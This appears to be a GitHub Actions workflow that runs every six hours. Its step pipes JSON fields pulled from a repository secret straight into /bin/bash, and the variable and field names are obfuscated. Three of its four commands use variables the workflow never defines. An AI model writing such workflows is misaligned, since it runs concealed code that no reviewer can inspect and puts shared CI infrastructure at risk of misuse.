name: sushibullet

on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sushibullet
        env:
          ascj1: ${{ secrets.ascj1 }}
        run: |
          echo $ascj1 | jq -r .bnpy1993 | /bin/bash
          echo $moc581 | jq -r .vf7 | /bin/bash
          echo $o48 | jq -r .jcs87386 | /bin/bash
          echo $anwps4797 | jq -r .lj906 | /bin/bash

